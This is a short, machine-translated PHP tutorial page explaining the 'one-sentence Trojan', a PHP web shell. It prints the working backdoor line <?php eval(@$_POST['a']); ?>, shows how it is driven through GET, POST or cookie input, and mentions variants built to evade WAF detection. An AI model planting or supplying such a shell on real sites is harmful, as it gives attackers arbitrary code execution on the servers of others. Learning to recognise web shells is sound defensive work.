Home > Backend Development > PHP Problem > what is php pony

what is php pony

藏色散人
Release: 2023-02-25 18:38:01
Original
4109 people have browsed it

what is php pony

#phpWhat is Pony?

php Xiaoma is also a Trojan horse in one sentence, which refers to a Trojan horse that only needs one line of code. With just one line of code, it can achieve the same functions as the big horse. In order to bypass the detection of WAF, the one-sentence Trojan has appeared in countless variations, but the essence remains the same: the function of the Trojan executes the command we sent.

How do we send commands, and how are the sent commands executed?

We can submit data to a website through three methods: GET, POST, and COOKIE. The one-sentence Trojan uses $_GET[' '], $_POST[' '], and $_COOKIE[' ' ] Receive the data we passed, and pass the received data to the function that executes the command in the one-sentence Trojan, and then execute the command.

So most of the classic one-sentence Trojans you see have only two parts, one is the function part that can execute the code, and the other is the part that receives data.

For example:

<?php eval(@$_POST[&#39;a&#39;]); ?>
Copy after login

where eval is the function that executes the command, and $_POST['a'] is the received data. The eval function executes the received data as PHP code. In this way, we can let the website with a one-sentence Trojan inserted execute any PHP statement we passed. This is the power of the one-sentence Trojan.

Example:

what is php pony

Because the Trojan receives the data of "a" in the post request ($_POST['a']), we must post method sends data and assigns the code we want to execute to "a". If we replace post in the Trojan with get, then we need to send "a" with the GET method, (like this: http://127.0.0.1/test.php?a=phpinfo(); ) I won't Will demonstrate again.

For more PHP knowledge, please visit PHP Chinese website!

The above is the detailed content of what is php pony. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template